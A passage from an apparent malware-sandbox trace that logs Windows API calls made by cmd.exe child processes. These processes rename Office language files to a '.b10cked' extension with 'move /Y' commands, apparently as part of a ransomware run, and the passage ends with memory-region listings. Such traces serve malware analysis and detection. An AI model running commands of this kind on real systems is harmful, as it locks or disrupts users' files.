lpData=0x2ee818*=0x9, lpcbData=0x2ee810*=0x4) returned 0x0 [0153.101] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee814, lpData=0x2ee818, lpcbData=0x2ee810*=0x1000 | out: lpType=0x2ee814*=0x4, lpData=0x2ee818*=0x9, lpcbData=0x2ee810*=0x4) returned 0x0 [0153.101] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee814, lpData=0x2ee818, lpcbData=0x2ee810*=0x1000 | out: lpType=0x2ee814*=0x0, lpData=0x2ee818*=0x9, lpcbData=0x2ee810*=0x1000) returned 0x2 [0153.102] RegCloseKey (hKey=0x40) returned 0x0 [0153.102] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88637b [0153.102] srand (_Seed=0x5b88637b) [0153.102] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.DLL.trx_dll.b10cked\"" [0153.102] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.DLL.trx_dll.b10cked\"" [0153.102] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0153.102] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4f1970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0153.102] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0153.102] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0153.102] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0153.103] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0153.103] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0153.103] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0153.103] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0153.103] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0153.103] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0153.103] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0153.103] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0153.103] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0153.103] GetEnvironmentStringsW () returned 0x4f2360* [0153.103] FreeEnvironmentStringsW (penv=0x4f2360) returned 1 [0153.103] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0153.103] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0153.103] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0153.103] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0153.103] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0153.103] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0153.103] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0153.103] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0153.103] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0153.103] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0153.103] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef5d8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0153.104] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef5d8, lpFilePart=0x2ef5d4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef5d4*="Desktop") returned 0x18 [0153.104] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0153.104] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef354 | out: lpFindFileData=0x2ef354) returned 0x4f09f0 [0153.104] FindClose (in: hFindFile=0x4f09f0 | out: hFindFile=0x4f09f0) returned 1 [0153.104] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef354 | out: lpFindFileData=0x2ef354) returned 0x4f09f0 [0153.104] FindClose (in: hFindFile=0x4f09f0 | out: hFindFile=0x4f09f0) returned 1 [0153.104] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef354 | out: lpFindFileData=0x2ef354) returned 0x4f09f0 [0153.104] FindClose (in: hFindFile=0x4f09f0 | out: hFindFile=0x4f09f0) returned 1 [0153.104] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0153.105] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0153.105] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0153.105] GetEnvironmentStringsW () returned 0x4f0210* [0153.105] FreeEnvironmentStringsW (penv=0x4f0210) returned 1 [0153.105] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0153.105] GetConsoleOutputCP () returned 0x1b5 [0153.108] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0153.108] GetUserDefaultLCID () returned 0x409 [0153.108] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0153.108] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ef718, cchData=128 | out: lpLCData="0") returned 2 [0153.108] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ef718, cchData=128 | out: lpLCData="0") returned 2 [0153.108] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ef718, cchData=128 | out: lpLCData="1") returned 2 [0153.108] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0153.108] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0153.109] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0153.109] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0153.109] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0153.109] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0153.109] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0153.109] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0153.109] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0153.109] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0153.109] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0153.110] GetConsoleTitleW (in: lpConsoleTitle=0x4e0930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0153.110] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0153.110] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0153.110] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0153.110] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0153.112] _wcsicmp (_String1="move", _String2=")") returned 68 [0153.112] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0153.112] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0153.112] _wcsicmp (_String1="IF", _String2="move") returned -4 [0153.112] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0153.112] _wcsicmp (_String1="REM", _String2="move") returned 5 [0153.112] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0153.120] GetConsoleTitleW (in: lpConsoleTitle=0x2ef410, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0153.208] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0153.208] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0153.208] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0153.208] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0153.208] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0153.208] _wcsicmp (_String1="move", _String2="CD") returned 10 [0153.208] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0153.208] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0153.208] _wcsicmp (_String1="move", _String2="REN") returned -5 [0153.208] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0153.208] _wcsicmp (_String1="move", _String2="SET") returned -6 [0153.208] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0153.208] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0153.208] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0153.208] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0153.208] _wcsicmp (_String1="move", _String2="MD") returned 11 [0153.208] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0153.208] _wcsicmp (_String1="move", _String2="RD") returned -5 [0153.209] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0153.209] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0153.209] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0153.209] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0153.209] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0153.209] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0153.209] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0153.209] _wcsicmp (_String1="move", _String2="VER") returned -9 [0153.209] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0153.209] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0153.209] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0153.209] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0153.209] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0153.209] _wcsicmp (_String1="move", _String2="START") returned -6 [0153.209] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0153.209] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0153.209] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0153.211] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0153.211] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0153.211] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2ef1cc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2ef1c4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2ef1c4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0153.211] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0153.211] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0153.211] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0153.211] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0153.211] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0153.211] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0153.211] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0153.211] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0153.211] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0153.211] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0153.211] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0153.211] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0153.212] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0153.212] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0153.212] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0153.212] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.212] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.212] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.212] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.212] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0153.212] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0153.212] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0153.212] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0153.212] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0153.212] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0153.212] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0153.212] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0153.212] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0153.212] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0153.212] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0153.212] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0153.212] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0153.212] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0153.213] _wcsicmp (_String1="GRINTL~1.TRX", _String2=".") returned 57 [0153.213] _wcsicmp (_String1="GRINTL~1.TRX", _String2="..") returned 57 [0153.213] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\grintl~1.trx")) returned 0x2020 [0153.213] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4f1f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0153.213] SetErrorMode (uMode=0x0) returned 0x0 [0153.213] SetErrorMode (uMode=0x1) returned 0x0 [0153.213] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x2eeb54, lpFilePart=0x2eeb3c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~1.TRX", lpFilePart=0x2eeb3c*="GRINTL~1.TRX") returned 0x3c [0153.213] SetErrorMode (uMode=0x0) returned 0x1 [0153.213] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0153.213] _wcsicmp (_String1="GRINTL~1.TRX", _String2=".") returned 57 [0153.213] _wcsicmp (_String1="GRINTL~1.TRX", _String2="..") returned 57 [0153.213] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\grintl~1.trx")) returned 0x2020 [0153.214] SetErrorMode (uMode=0x0) returned 0x0 [0153.214] SetErrorMode (uMode=0x1) returned 0x0 [0153.214] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x2eefd0, lpFilePart=0x2eed68 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~1.TRX", lpFilePart=0x2eed68*="GRINTL~1.TRX") returned 0x3c [0153.214] SetErrorMode (uMode=0x0) returned 0x1 [0153.214] SetErrorMode (uMode=0x0) returned 0x0 [0153.214] SetErrorMode (uMode=0x1) returned 0x0 [0153.214] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x2ef1d8, lpFilePart=0x2eed68 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.DLL.trx_dll.b10cked", lpFilePart=0x2eed68*="GRINTL32.DLL.trx_dll.b10cked") returned 0x4c [0153.214] SetErrorMode (uMode=0x0) returned 0x1 [0153.214] SetLastError (dwErrCode=0x0) [0153.214] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\grintl32.dll.trx_dll.b10cked")) returned 0xffffffff [0153.214] GetLastError () returned 0x2 [0153.214] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x2ee6e4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ee6e4) returned 0x4f2130 [0153.214] FindNextFileW (in: hFindFile=0x4f2130, lpFindFileData=0x2ee6e4 | out: lpFindFileData=0x2ee6e4) returned 0 [0153.215] GetLastError () returned 0x12 [0153.215] FindClose (in: hFindFile=0x4f2130 | out: hFindFile=0x4f2130) returned 1 [0153.216] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x4f1cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4f1cc0) returned 0x4f2130 [0153.217] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x2ee97c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4c [0153.217] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x2ee97c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.DLL.trx_dll", lpFilePart=0x0) returned 0x44 [0153.217] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\grintl32.dll.trx_dll")) returned 0x2020 [0153.217] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\grintl32.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\grintl32.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0153.217] FindClose (in: hFindFile=0x4f2130 | out: hFindFile=0x4f2130) returned 1 [0153.217] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2ee930 | out: _Buffer=" 1") returned 9 [0153.217] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.217] GetFileType (hFile=0x7) returned 0x2 [0153.218] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0153.218] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ee8bc | out: lpMode=0x2ee8bc) returned 1 [0153.218] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.218] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ee8f0 | out: lpConsoleScreenBufferInfo=0x2ee8f0) returned 1 [0153.218] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0153.218] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2ee930 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0153.218] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2ee914, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2ee914*=0x1a) returned 1 [0153.219] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.219] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0153.219] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.219] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0153.219] _get_osfhandle (_FileHandle=0) returned 0x3 [0153.219] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0153.219] SetConsoleInputExeNameW () returned 0x1 [0153.219] GetConsoleOutputCP () returned 0x1b5 [0153.219] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0153.219] SetThreadUILanguage (LangId=0x0) returned 0x409 [0153.219] exit (_Code=0) Process: id = "252" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b40" os_pid = "0xddc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.REST.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 20663 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 20664 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 20665 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 20666 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 20667 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 20668 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 20669 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 20670 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 20671 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 20672 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 20703 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 20704 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 20705 start_va = 0x60000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 20706 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 20707 start_va = 0x2b0000 end_va = 0x316fff entry_point = 0x2b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 20708 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 20709 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 20710 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 20711 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = 